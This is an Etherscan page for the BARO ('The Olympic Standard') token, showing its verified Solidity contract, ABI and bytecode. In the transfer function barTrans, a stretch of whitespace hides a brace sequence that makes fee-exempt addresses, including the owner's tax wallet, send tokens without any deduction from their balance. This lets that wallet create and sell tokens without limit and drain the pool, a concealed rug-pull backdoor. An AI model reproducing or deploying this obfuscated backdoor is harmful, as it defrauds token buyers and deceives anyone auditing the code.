ETH Price: $2,410.43 (-0.54%)

Token

The Olympic Standard (BARO)
 

Overview

Max Total Supply

555,555,555 BARO

Holders

71

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
6,490,046.493124192 BARO

Value
$0.00
0xb16247b8d908cd0b9c66d4f27c3d961d7646545b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OlympicStandard

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-07-28
*/

// SPDX-License-Identifier: UNLICENSED

/**

    -- https://olympicstandard.bar
    -- https://t.me/OlympicStandard
    -- https://x.com/barox2024

*/

pragma solidity 0.8.24;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);
}

contract OlympicStandard is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    mapping(address => bool) private _feeExempt;
    mapping(address => bool) private _bots;
    address payable private _barAddress;

    uint256 private _initialBuyTax = 80;
    uint256 private _initialSellTax = 5;
    uint256 private _finalBuyTax = 0;
    uint256 private _finalSellTax = 0;
    uint256 private _reduceBuyTaxAt = 7;
    uint256 private _reduceSellTaxAt = 7;
    uint256 private _preventSwapBefore = 7;
    uint256 private _buyCount = 0;

    uint8 public constant decimals = 9;
    uint256 public constant totalSupply = 555_555_555 * 10 ** decimals;
    string public constant name = unicode"The Olympic Standard";
    string public constant symbol = unicode"BARO";
    uint256 public _maxTxAmount = 10_000_000 * 10 ** decimals;
    uint256 public _maxWalletSize = 10_000_000 * 10 ** decimals;
    uint256 public _taxSwapThreshold = 5_000_000 * 10 ** decimals;
    uint256 public _maxTaxSwap = 10_000_000 * 10 ** decimals;

    IUniswapV2Router02 private _uniswapV2Router;
    address private _uniswapV2Pair;
    bool private _isTradingOpen;
    bool private _isInSwap;
    uint256 private sellStart = 0;
    uint256 private barlastSellBlock = 0;
    event MaxTxAmountUpdated(uint _maxTxAmount);
    modifier lockTheSwap() {
        _isInSwap = true;
        _;
        _isInSwap = false;
    }

    constructor(address router_, address taxWallet_) {
        _uniswapV2Router = IUniswapV2Router02(router_);

        _barAddress = payable(taxWallet_);
        balanceOf[_msgSender()] = totalSupply;
        _feeExempt[_msgSender()] = true;
        _feeExempt[address(this)] = true;
        _feeExempt[_barAddress] = true;

        emit Transfer(address(0), _msgSender(), totalSupply);
    }

    function transfer(
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        barTrans(_msgSender(), recipient, amount);
        return true;
    }

    function approve(
        address spender,
        uint256 amount
    ) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        barTrans(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            allowance[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        allowance[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function barTrans(address barF,address barT,uint256 barA) private {
        require(barF  != address(0), "ERC20: transfer from the zero address");
        require(barT != address(0), "ERC20: transfer to the zero address");
        require(barA > 0, "Transfer amount must be greater than zero");
        if (!_isTradingOpen || _isInSwap) {
            require(_feeExempt[barF ] || _feeExempt[barT]);
            balanceOf[barF ] = balanceOf[barF ].sub(barA);
            balanceOf[barT] = balanceOf[barT].add(barA);
            emit Transfer(barF , barT, barA);
            return;
        }
        uint256 barTA = barlastSellBlock;
        uint256 barTxA = 0;
        if (barF  != owner() && barT != owner() && barT != _barAddress) {
            require(!_bots[barF ] && !_bots[barT]);

            if (barF  == _uniswapV2Pair && barT != address(_uniswapV2Router) && !_feeExempt[barT]) {
                require(_isTradingOpen, "Trading not open yet");
                require(barA <= _maxTxAmount, "Exceeds the _maxTxAmount.");
                require(balanceOf[barT] + barA <= _maxWalletSize, "Exceeds the maxWalletSize.");
                barTxA = barA.mul((_buyCount > _reduceBuyTaxAt) ? _finalBuyTax: _initialBuyTax).div(100);
                _buyCount++;                                                                                                                                                                                                        }{
                barTA = _calcTransferAmount(barF , barA);
            }

            if (barT == _uniswapV2Pair && barF  != address(this)) {
                barTxA = barA.mul((_buyCount > _reduceSellTaxAt) ? _finalSellTax : _initialSellTax).div(100);
            }

            uint256 contractTokenBalance = balanceOf[address(this)];
            if (!_isInSwap && barT == _uniswapV2Pair && _isTradingOpen && contractTokenBalance > _taxSwapThreshold && _buyCount > _preventSwapBefore) {
                if (block.number > barlastSellBlock) sellStart = 0;
                swapTokensForEth(min(barA, min(contractTokenBalance, _maxTaxSwap)));
                sellStart++;
            }
            if (barT == _uniswapV2Pair) sendETHToFee(address(this).balance);
        }

        if (barTxA > 0) {
            balanceOf[address(this)] = balanceOf[address(this)].add(barTxA);
            emit Transfer(barF , address(this), barTxA);
        }
        balanceOf[barF ] = balanceOf[barF ].sub(barA - barTA);
        balanceOf[barT] = balanceOf[barT].add(barA.sub(barTxA));
        emit Transfer(barF , barT, barA.sub(barTxA));
    }

    function _calcTransferAmount(
        address from,
        uint256 amount
    ) private view returns (uint256) {
        bool exempt = _feeExempt[from];
        return exempt ? amount : amount.mul(_finalBuyTax).div(100);
    }

    function min(uint256 a, uint256 b) private pure returns (uint256) {
        return (a > b) ? b : a;
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        _maxTxAmount = totalSupply;
        _maxWalletSize = totalSupply;
        emit MaxTxAmountUpdated(totalSupply);
    }

    function sendETHToFee(uint256 amount) private {
        _barAddress.transfer(amount);
    }

    function addBot(address[] memory bots_) public onlyOwner {
        for (uint i = 0; i < bots_.length; i++) {
            _bots[bots_[i]] = true;
        }
    }

    function delBot(address[] memory notbot) public onlyOwner {
        for (uint i = 0; i < notbot.length; i++) {
            _bots[notbot[i]] = false;
        }
    }

    function addLiquidity() external onlyOwner {
        require(!_isTradingOpen, "trading is already open");
        _approve(address(this), address(_uniswapV2Router), totalSupply);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        _uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf[address(this)],
            0,
            0,
            owner(),
            block.timestamp
        );
        IERC20(_uniswapV2Pair).approve(
            address(_uniswapV2Router),
            type(uint).max
        );
    }

    function enableTrading() external onlyOwner {
        _isTradingOpen = true;
    }

    receive() external payable {}

    function rescueERC20(address _address, uint256 percent) external onlyOwner {
        uint256 _amount = IERC20(_address).balanceOf(address(this)).mul(percent).div(100);
        IERC20(_address).transfer(owner(), _amount);
    }

    function rescueETH() external onlyOwner {
        require(address(this).balance > 0);
        payable(owner()).transfer(address(this).balance);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router_","type":"address"},{"internalType":"address","name":"taxWallet_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_maxTxAmount","type":"uint256"}],"name":"MaxTxAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"bots_","type":"address[]"}],"name":"addBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"notbot","type":"address[]"}],"name":"delBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"percent","type":"uint256"}],"name":"rescueERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052605060065560056007555f6008555f6009556007600a556007600b556007600c555f600d556009600a62000039919062000329565b62000048906298968062000340565b600e55620000596009600a62000329565b62000068906298968062000340565b600f55620000796009600a62000329565b6200008890624c4b4062000340565b601055620000996009600a62000329565b620000a8906298968062000340565b6011555f6014555f601555348015620000bf575f80fd5b50604051620020d1380380620020d1833981016040819052620000e29162000376565b5f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350601280546001600160a01b038085166001600160a01b0319928316179092556005805492841692909116919091179055620001606009600a62000329565b620001709063211d1ae362000340565b335f8181526001602081815260408084209590955560039052838220805460ff19908116831790915530835284832080548216831790556005546001600160a01b03168352938220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620001f16009600a62000329565b620002019063211d1ae362000340565b60405190815260200160405180910390a35050620003ac565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200026e57815f19048211156200025257620002526200021a565b808516156200026057918102915b93841c939080029062000233565b509250929050565b5f82620002865750600162000323565b816200029457505f62000323565b8160018114620002ad5760028114620002b857620002d8565b600191505062000323565b60ff841115620002cc57620002cc6200021a565b50506001821b62000323565b5060208310610133831016604e8410600b8410161715620002fd575081810a62000323565b6200030983836200022e565b805f19048211156200031f576200031f6200021a565b0290505b92915050565b5f6200033960ff84168362000276565b9392505050565b80820281158282048414176200032357620003236200021a565b80516001600160a01b038116811462000371575f80fd5b919050565b5f806040838503121562000388575f80fd5b62000393836200035a565b9150620003a3602084016200035a565b90509250929050565b611d1780620003ba5f395ff3fe608060405260043610610134575f3560e01c80637d1db4a5116100a857806395d89b411161006d57806395d89b411461034a578063a9059cbb14610379578063bf474bed14610398578063c97c1821146103ad578063dd62ed3e146103cc578063e8078d9414610402575f80fd5b80637d1db4a5146102c75780638a8c523c146102dc5780638cd4426d146102f05780638da5cb5b1461030f5780638f9a55c014610335575f80fd5b806321bbcbb1116100f957806321bbcbb11461021057806323b872dd1461022f578063313ce5671461024e57806370a0823114610274578063715018a61461029f578063751039fc146102b3575f80fd5b806306fdde031461013f578063095ea7b3146101945780630faee56f146101c357806318160ddd146101e657806320800a00146101fa575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5061017e60405180604001604052806014815260200173151a194813db1e5b5c1a58c814dd185b99185c9960621b81525081565b60405161018b919061180f565b60405180910390f35b34801561019f575f80fd5b506101b36101ae36600461187f565b610416565b604051901515815260200161018b565b3480156101ce575f80fd5b506101d860115481565b60405190815260200161018b565b3480156101f1575f80fd5b506101d861042c565b348015610205575f80fd5b5061020e610449565b005b34801561021b575f80fd5b5061020e61022a3660046118bd565b6104c0565b34801561023a575f80fd5b506101b361024936600461197d565b610548565b348015610259575f80fd5b50610262600981565b60405160ff909116815260200161018b565b34801561027f575f80fd5b506101d861028e3660046119bb565b60016020525f908152604090205481565b3480156102aa575f80fd5b5061020e6105af565b3480156102be575f80fd5b5061020e610620565b3480156102d2575f80fd5b506101d8600e5481565b3480156102e7575f80fd5b5061020e6106d1565b3480156102fb575f80fd5b5061020e61030a36600461187f565b61070f565b34801561031a575f80fd5b505f546040516001600160a01b03909116815260200161018b565b348015610340575f80fd5b506101d8600f5481565b348015610355575f80fd5b5061017e604051806040016040528060048152602001634241524f60e01b81525081565b348015610384575f80fd5b506101b361039336600461187f565b61084f565b3480156103a3575f80fd5b506101d860105481565b3480156103b8575f80fd5b5061020e6103c73660046118bd565b61085b565b3480156103d7575f80fd5b506101d86103e63660046119d6565b600260209081525f928352604080842090915290825290205481565b34801561040d575f80fd5b5061020e6108de565b5f610422338484610c37565b5060015b92915050565b6104386009600a611b01565b6104469063211d1ae3611b0f565b81565b5f546001600160a01b0316331461047b5760405162461bcd60e51b815260040161047290611b26565b60405180910390fd5b5f4711610486575f80fd5b5f80546040516001600160a01b03909116914780156108fc02929091818181858888f193505050501580156104bd573d5f803e3d5ffd5b50565b5f546001600160a01b031633146104e95760405162461bcd60e51b815260040161047290611b26565b5f5b815181101561054457600160045f84848151811061050b5761050b611b5b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff19169115159190911790556001016104eb565b5050565b5f610554848484610d5b565b6105a584336105a085604051806060016040528060288152602001611cba602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611442565b610c37565b5060019392505050565b5f546001600160a01b031633146105d85760405162461bcd60e51b815260040161047290611b26565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146106495760405162461bcd60e51b815260040161047290611b26565b6106556009600a611b01565b6106639063211d1ae3611b0f565b600e556106726009600a611b01565b6106809063211d1ae3611b0f565b600f557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6106b06009600a611b01565b6106be9063211d1ae3611b0f565b60405190815260200160405180910390a1565b5f546001600160a01b031633146106fa5760405162461bcd60e51b815260040161047290611b26565b6013805460ff60a01b1916600160a01b179055565b5f546001600160a01b031633146107385760405162461bcd60e51b815260040161047290611b26565b6040516370a0823160e01b81523060048201525f906107b9906064906107b39085906001600160a01b038816906370a0823190602401602060405180830381865afa158015610789573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ad9190611b6f565b9061147a565b906114ff565b9050826001600160a01b031663a9059cbb6107db5f546001600160a01b031690565b6040516001600160e01b031960e084901b1681526001600160a01b039091166004820152602481018490526044016020604051808303815f875af1158015610825573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108499190611b86565b50505050565b5f610422338484610d5b565b5f546001600160a01b031633146108845760405162461bcd60e51b815260040161047290611b26565b5f5b8151811015610544575f60045f8484815181106108a5576108a5611b5b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055600101610886565b5f546001600160a01b031633146109075760405162461bcd60e51b815260040161047290611b26565b601354600160a01b900460ff16156109615760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610472565b60125461098d9030906001600160a01b031661097f6009600a611b01565b6105a09063211d1ae3611b0f565b60125f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109dd573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a019190611ba5565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a60573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a849190611ba5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610af29190611ba5565b601380546001600160a01b0319166001600160a01b03928316179055601254305f8181526001602052604081205481549385169463f305d719944794939182911660405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610b99573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610bbe9190611bc0565b505060135460125460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610c13573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104bd9190611b86565b6001600160a01b038316610c995760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610472565b6001600160a01b038216610cfa5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610472565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610dbf5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610472565b6001600160a01b038216610e215760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610472565b5f8111610e825760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610472565b601354600160a01b900460ff161580610ea45750601354600160a81b900460ff165b15610f91576001600160a01b0383165f9081526003602052604090205460ff1680610ee657506001600160a01b0382165f9081526003602052604090205460ff165b610eee575f80fd5b6001600160a01b0383165f90815260016020526040902054610f109082611540565b6001600160a01b038085165f908152600160205260408082209390935590841681522054610f3e9082611581565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610d4e9085815260200190565b6015545f80546001600160a01b03868116911614801590610fbf57505f546001600160a01b03858116911614155b8015610fd957506005546001600160a01b03858116911614155b156112fb576001600160a01b0385165f9081526004602052604090205460ff1615801561101e57506001600160a01b0384165f9081526004602052604090205460ff16155b611026575f80fd5b6013546001600160a01b03868116911614801561105157506012546001600160a01b03858116911614155b801561107557506001600160a01b0384165f9081526003602052604090205460ff16155b156111cd57601354600160a01b900460ff166110ca5760405162461bcd60e51b8152602060048201526014602482015273151c98591a5b99c81b9bdd081bdc195b881e595d60621b6044820152606401610472565b600e5483111561111c5760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e000000000000006044820152606401610472565b600f546001600160a01b0385165f90815260016020526040902054611142908590611beb565b11156111905760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e0000000000006044820152606401610472565b6111b660646107b3600a54600d54116111ab576006546111af565b6008545b869061147a565b600d80549192505f6111c783611bfe565b91905055505b6111d785846115df565b6013549092506001600160a01b03858116911614801561120057506001600160a01b0385163014155b1561122d5761122a60646107b3600b54600d5411611220576007546111af565b600954869061147a565b90505b305f90815260016020526040902054601354600160a81b900460ff1615801561126357506013546001600160a01b038681169116145b80156112785750601354600160a01b900460ff165b8015611285575060105481115b80156112945750600c54600d54115b156112da576015544311156112a8575f6014555b6112c56112c0856112bb84601154611628565b611628565b61163c565b60148054905f6112d483611bfe565b91905055505b6013546001600160a01b03908116908616036112f9576112f9476117ac565b505b801561137357305f9081526001602052604090205461131a9082611581565b305f81815260016020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061136a9085815260200190565b60405180910390a35b61139e6113808385611c16565b6001600160a01b0387165f9081526001602052604090205490611540565b6001600160a01b0386165f908152600160205260409020556113e16113c38483611540565b6001600160a01b0386165f9081526001602052604090205490611581565b6001600160a01b038086165f8181526001602052604090209290925586167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61142a8685611540565b60405190815260200160405180910390a35050505050565b5f81848411156114655760405162461bcd60e51b8152600401610472919061180f565b505f6114718486611c16565b95945050505050565b5f825f0361148957505f610426565b5f6114948385611b0f565b9050826114a18583611c29565b146114f85760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610472565b9392505050565b5f6114f883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506117e3565b5f6114f883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611442565b5f8061158d8385611beb565b9050838110156114f85760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610472565b6001600160a01b0382165f9081526003602052604081205460ff168061161e5761161960646107b36008548661147a90919063ffffffff16565b611620565b825b949350505050565b5f81831161163657826114f8565b50919050565b6013805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061168257611682611b5b565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156116d9573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116fd9190611ba5565b8160018151811061171057611710611b5b565b6001600160a01b0392831660209182029290920101526012546117369130911684610c37565b60125460405163791ac94760e01b81526001600160a01b039091169063791ac9479061176e9085905f90869030904290600401611c48565b5f604051808303815f87803b158015611785575f80fd5b505af1158015611797573d5f803e3d5ffd5b50506013805460ff60a81b1916905550505050565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610544573d5f803e3d5ffd5b5f81836118035760405162461bcd60e51b8152600401610472919061180f565b505f6114718486611c29565b5f602080835283518060208501525f5b8181101561183b5785810183015185820160400152820161181f565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104bd575f80fd5b803561187a8161185b565b919050565b5f8060408385031215611890575f80fd5b823561189b8161185b565b946020939093013593505050565b634e487b7160e01b5f52604160045260245ffd5b5f60208083850312156118ce575f80fd5b823567ffffffffffffffff808211156118e5575f80fd5b818501915085601f8301126118f8575f80fd5b81358181111561190a5761190a6118a9565b8060051b604051601f19603f8301168101818110858211171561192f5761192f6118a9565b60405291825284820192508381018501918883111561194c575f80fd5b938501935b82851015611971576119628561186f565b84529385019392850192611951565b98975050505050505050565b5f805f6060848603121561198f575f80fd5b833561199a8161185b565b925060208401356119aa8161185b565b929592945050506040919091013590565b5f602082840312156119cb575f80fd5b81356114f88161185b565b5f80604083850312156119e7575f80fd5b82356119f28161185b565b91506020830135611a028161185b565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115611a5b57815f1904821115611a4157611a41611a0d565b80851615611a4e57918102915b93841c9390800290611a26565b509250929050565b5f82611a7157506001610426565b81611a7d57505f610426565b8160018114611a935760028114611a9d57611ab9565b6001915050610426565b60ff841115611aae57611aae611a0d565b50506001821b610426565b5060208310610133831016604e8410600b8410161715611adc575081810a610426565b611ae68383611a21565b805f1904821115611af957611af9611a0d565b029392505050565b5f6114f860ff841683611a63565b808202811582820484141761042657610426611a0d565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611b7f575f80fd5b5051919050565b5f60208284031215611b96575f80fd5b815180151581146114f8575f80fd5b5f60208284031215611bb5575f80fd5b81516114f88161185b565b5f805f60608486031215611bd2575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561042657610426611a0d565b5f60018201611c0f57611c0f611a0d565b5060010190565b8181038181111561042657610426611a0d565b5f82611c4357634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015611c985784516001600160a01b031683529383019391830191600101611c73565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122062add457b344c4a13c367cd54db7c93b9ca5c05b29f2cd2f54fa3b38cff6dac964736f6c634300081800330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000711aacece5f007d9a8223f9393c9d9a25f08af4c

Deployed Bytecode

